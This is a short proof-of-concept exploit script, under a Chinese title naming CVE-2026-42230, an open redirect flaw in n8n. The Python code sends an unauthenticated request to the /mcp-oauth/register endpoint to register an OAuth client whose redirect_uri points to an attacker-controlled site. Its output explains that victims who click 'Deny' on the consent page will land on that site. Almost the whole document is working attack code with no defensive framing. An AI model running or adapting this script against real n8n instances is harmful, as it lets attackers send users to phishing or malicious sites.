CVE-2026-42230 n8n开放重定向漏洞

import requests # Target configuration target_url = "http://localhost:5678" malicious_site = "https://attacker-controlled-site.com" # Step 1: Register a malicious OAuth client # The endpoint /mcp-oauth/register accepts arbitrary redirect_uri without auth register_endpoint = f"{target_url}/mcp-oauth/register" payload = { "client_name": "ExploitClient", "redirect_uri": malicious_site } print(f"[*] Attempting to register malicious client with redirect to {malicious_site}...") response = requests.post(register_endpoint, json=payload) if response.status_code == 200: print("[+] Client registered successfully.") print("[+] When a victim visits the consent page and clicks 'Deny', they will be redirected to the malicious site.") else: print(f"[-] Registration failed. Status code: {response.status_code}")